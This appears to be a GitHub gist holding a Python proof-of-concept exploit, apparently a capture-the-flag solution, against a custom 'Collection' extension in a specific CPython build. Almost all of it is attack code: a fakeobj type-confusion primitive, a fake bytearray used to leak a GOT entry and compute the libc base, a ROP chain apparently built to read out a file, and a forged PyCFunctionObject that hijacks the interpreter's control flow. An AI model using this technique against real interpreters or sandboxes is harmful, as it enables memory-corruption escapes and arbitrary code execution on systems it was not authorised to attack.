@andreafioraldi
Created December 31, 2018 17:14
# Lookup table equivalent to the builtin ``chr(i)`` for every i in 0..255,
# spelled out as a literal dict. The name deliberately shadows the builtin
# ``chr``: p64 below indexes it with ``chr[...]`` (dict subscript), not a
# call. Presumably kept as a literal because builtins are not available in
# the environment this is meant to run in — TODO confirm; do not replace it
# with a builtin-based construction without checking that.
chr = {0: '\x00', 1: '\x01', 2: '\x02', 3: '\x03', 4: '\x04', 5: '\x05', 6: '\x06', 7: '\x07', 8: '\x08', 9: '\t', 10: '\n', 11: '\x0b', 12: '\x0c', 13: '\r', 14: '\x0e', 15: '\x0f', 16: '\x10', 17: '\x11', 18: '\x12', 19: '\x13', 20: '\x14', 21: '\x15', 22: '\x16', 23: '\x17', 24: '\x18', 25: '\x19', 26: '\x1a', 27: '\x1b', 28: '\x1c', 29: '\x1d', 30: '\x1e', 31: '\x1f', 32: ' ', 33: '!', 34: '"', 35: '#', 36: '$', 37: '%', 38: '&', 39: "'", 40: '(', 41: ')', 42: '*', 43: '+', 44: ',', 45: '-', 46: '.', 47: '/', 48: '0', 49: '1', 50: '2', 51: '3', 52: '4', 53: '5', 54: '6', 55: '7', 56: '8', 57: '9', 58: ':', 59: ';', 60: '<', 61: '=', 62: '>', 63: '?', 64: '@', 65: 'A', 66: 'B', 67: 'C', 68: 'D', 69: 'E', 70: 'F', 71: 'G', 72: 'H', 73: 'I', 74: 'J', 75: 'K', 76: 'L', 77: 'M', 78: 'N', 79: 'O', 80: 'P', 81: 'Q', 82: 'R', 83: 'S', 84: 'T', 85: 'U', 86: 'V', 87: 'W', 88: 'X', 89: 'Y', 90: 'Z', 91: '[', 92: '\\', 93: ']', 94: '^', 95: '_', 96: '`', 97: 'a', 98: 'b', 99: 'c', 100: 'd', 101: 'e', 102: 'f', 103: 'g', 104: 'h', 105: 'i', 106: 'j', 107: 'k', 108: 'l', 109: 'm', 110: 'n', 111: 'o', 112: 'p', 113: 'q', 114: 'r', 115: 's', 116: 't', 117: 'u', 118: 'v', 119: 'w', 120: 'x', 121: 'y', 122: 'z', 123: '{', 124: '|', 125: '}', 126: '~', 127: '\x7f', 128: '\x80', 129: '\x81', 130: '\x82', 131: '\x83', 132: '\x84', 133: '\x85', 134: '\x86', 135: '\x87', 136: '\x88', 137: '\x89', 138: '\x8a', 139: '\x8b', 140: '\x8c', 141: '\x8d', 142: '\x8e', 143: '\x8f', 144: '\x90', 145: '\x91', 146: '\x92', 147: '\x93', 148: '\x94', 149: '\x95', 150: '\x96', 151: '\x97', 152: '\x98', 153: '\x99', 154: '\x9a', 155: '\x9b', 156: '\x9c', 157: '\x9d', 158: '\x9e', 159: '\x9f', 160: '\xa0', 161: '\xa1', 162: '\xa2', 163: '\xa3', 164: '\xa4', 165: '\xa5', 166: '\xa6', 167: '\xa7', 168: '\xa8', 169: '\xa9', 170: '\xaa', 171: '\xab', 172: '\xac', 173: '\xad', 174: '\xae', 175: '\xaf', 176: '\xb0', 177: '\xb1', 178: '\xb2', 179: '\xb3', 180: '\xb4', 181: '\xb5', 182: '\xb6', 183: '\xb7', 
184: '\xb8', 185: '\xb9', 186: '\xba', 187: '\xbb', 188: '\xbc', 189: '\xbd', 190: '\xbe', 191: '\xbf', 192: '\xc0', 193: '\xc1', 194: '\xc2', 195: '\xc3', 196: '\xc4', 197: '\xc5', 198: '\xc6', 199: '\xc7', 200: '\xc8', 201: '\xc9', 202: '\xca', 203: '\xcb', 204: '\xcc', 205: '\xcd', 206: '\xce', 207: '\xcf', 208: '\xd0', 209: '\xd1', 210: '\xd2', 211: '\xd3', 212: '\xd4', 213: '\xd5', 214: '\xd6', 215: '\xd7', 216: '\xd8', 217: '\xd9', 218: '\xda', 219: '\xdb', 220: '\xdc', 221: '\xdd', 222: '\xde', 223: '\xdf', 224: '\xe0', 225: '\xe1', 226: '\xe2', 227: '\xe3', 228: '\xe4', 229: '\xe5', 230: '\xe6', 231: '\xe7', 232: '\xe8', 233: '\xe9', 234: '\xea', 235: '\xeb', 236: '\xec', 237: '\xed', 238: '\xee', 239: '\xef', 240: '\xf0', 241: '\xf1', 242: '\xf2', 243: '\xf3', 244: '\xf4', 245: '\xf5', 246: '\xf6', 247: '\xf7', 248: '\xf8', 249: '\xf9', 250: '\xfa', 251: '\xfb', 252: '\xfc', 253: '\xfd', 254: '\xfe', 255: '\xff'}
def p64(n):
    """Pack *n* as a little-endian 64-bit value into an 8-character ``str``.

    Each character is taken from the module-level ``chr`` lookup table (a
    dict keyed 0..255, not the builtin), so the result is a ``str`` whose
    code points are the byte values, least-significant byte first. Bits of
    *n* above 63 are discarded by the masking; no builtins are used, to keep
    the same dependency footprint as the original unrolled version.
    """
    packed = ""
    for shift in (0, 8, 16, 24, 32, 40, 48, 56):
        packed += chr[(n >> shift) & 0xFF]
    return packed
def u64(b):
    """Unpack the first 8 elements of *b* as an unsigned little-endian 64-bit int.

    *b* is indexed as ``b[0]`` .. ``b[7]`` and each element is shifted by
    8 * index, so any sequence of ints (``bytes``, ``bytearray``, a list)
    works; fewer than 8 elements raises ``IndexError`` and extra elements are
    ignored. Written without builtins on purpose, matching the rest of the
    file.
    """
    value = 0
    shift = 0
    for index in (0, 1, 2, 3, 4, 5, 6, 7):
        value += b[index] << shift
        shift += 8
    return value
def addressof(obj):
    """Return ``id(obj) + 72``.

    This only makes sense on CPython, where ``id()`` is the object's memory
    address; the result is therefore interpreter-specific. The 72-byte
    offset is a hard-coded assumption about the in-memory layout of the
    objects this script passes in, tied to the targeted build —
    NOTE(review): confirm before reusing on any other interpreter version.
    """
    base = id(obj)
    return 72 + base
def fakeobj(addr):
    """Build two ``Collection.Collection`` objects and return ``b.get('2')``.

    ``Collection`` is not defined anywhere in this file; it must be supplied
    by the environment the script runs in. *addr* is stored as the value of
    key ``'1'`` in the second collection. ``a`` is never read afterwards —
    its construction before ``b`` appears to be intentional (the two dicts
    use the same keys in opposite order), so TODO confirm before removing
    or reordering it.
    """
    a = Collection.Collection({'1': 0, '2': []})
    b = Collection.Collection({'2': [], '1': addr})
    return b.get('2')
# --- proof-of-concept body, kept verbatim ---
# Every bare numeric constant from here down (the type descriptors, the GOT
# entry address, the libc delta, each ``libc + offset``, the string address
# and the flag value) is a hard-coded address or offset for one specific
# interpreter binary and libc build. None of it is portable: on any other
# build the values are simply wrong, and the most likely outcome is a crash
# of the interpreter process rather than any defined behaviour. Payloads are
# assembled as ``str`` via p64, so their bytes live at the ``str`` object's
# data offset that addressof() assumes.
fake_bytearray = ""
fake_bytearray += p64(3)
fake_bytearray += p64(0x09CE7E0) #bytearray type desc
fake_bytearray += p64(0x14)
fake_bytearray += p64(0x15)
fake_bytearray += p64(0x9B37B0) #got entry
fake_bytearray += p64(0x9B37B0)
fake_bytearray += p64(0)
got_entry = fakeobj(addressof(fake_bytearray))
# got_entry is expected to be bytes-like here (the fill char is b'\x00');
# ljust pads a short read to 8 bytes so u64's fixed b[0..7] indexing cannot
# raise IndexError, and [:8] drops anything beyond the first 8 bytes.
leak = u64(got_entry.ljust(8, b'\x00')[:8])
print("got entry:", hex(leak))
# Build-specific constant: the distance from the leaked value to the libc
# base for the targeted libc only.
libc = leak - 1615920
print("libc:", hex(libc))
iovec_buf = "a"*100
iovec_buf_len = 100
iovec = ""
iovec += p64(addressof(iovec_buf))
iovec += p64(iovec_buf_len)
chain = ""
chain += p64(libc + 0x000000000002155f)
chain += p64(1023)
chain += p64(libc + 0x0000000000023e6a)
chain += p64(addressof(iovec))
chain += p64(libc + 0x0000000000001b96)
chain += p64(1)
chain += p64(libc + 0x116600)
chain += p64(libc + 0x000000000002155f)
chain += p64(1)
chain += p64(libc + 0x0000000000023e6a)
chain += p64(addressof(iovec_buf))
chain += p64(libc + 0x0000000000001b96)
chain += p64(iovec_buf_len)
chain += p64(libc + 0x00110140)
chain += p64(libc + 0x000000000002155f)
chain += p64(0)
chain += p64(libc + 0x43120)
ctx = p64(addressof(chain))
ctx += p64(0x52368a) # ret
print("target:", hex(libc+0x520a5))
PyMethodDef = ''
PyMethodDef += p64(0x0713005) #readv string
PyMethodDef += p64(libc+0x520a5) #put here addr
PyMethodDef += p64(0x0008) #flags METH_0
PyMethodDef += p64(0x0713005) #readv string
PyCFunctionObject = ""
PyCFunctionObject += p64(3)
PyCFunctionObject += p64(0x9d0460) #cfunc type
PyCFunctionObject += p64(addressof(PyMethodDef))
PyCFunctionObject += p64(addressof(ctx) - 0xA0) #self (first arg)
PyCFunctionObject += p64(0)*2
#print("chain:", hex(addressof(chain)))
#print(hex(id(PyCFunctionObject)))
x = fakeobj(addressof(PyCFunctionObject))
print(hex(id(x)))
# Final step: nothing after this line is reached if the hard-coded values do
# not match the running build.
x(0)